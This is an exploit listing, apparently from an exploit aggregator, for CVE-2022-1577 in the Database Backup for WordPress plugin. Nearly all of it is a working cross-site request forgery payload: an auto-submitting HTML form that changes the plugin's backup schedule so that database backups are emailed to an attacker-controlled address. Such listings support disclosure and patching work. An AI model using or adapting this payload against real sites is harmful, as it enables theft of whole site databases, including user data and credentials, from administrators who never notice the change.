Exploit for Database Backup for WordPress < 2.5.2 - Arbitrary Schedule Settings Update via CSRF CVE-2022-1577

Name: Exploit for Database Backup for WordPress < 2.5.2 - Arbitrary Schedule Settings Update via CSRF CVE-2022-1577
Rating: 5 (73 reviews)

2022-05-11 | CVSS 5.8

## https://sploitus.com/exploit?id=WPEX-ID:39388900-266D-4308-88E7-D40CA6BBE346
<form id="test" action="https://example.com/wp-admin/tools.php?page=wp-db-backup#schedule" method="POST">
    <input type="text" name="wp_cron_schedule" value="daily">
    <input type="text" name="cron_backup_recipient" value="hacked@example.com">
    <input type="text" name="wp_cron_backup_options" value="SET">
</form>
<script>
    document.getElementById("test").submit();
</script>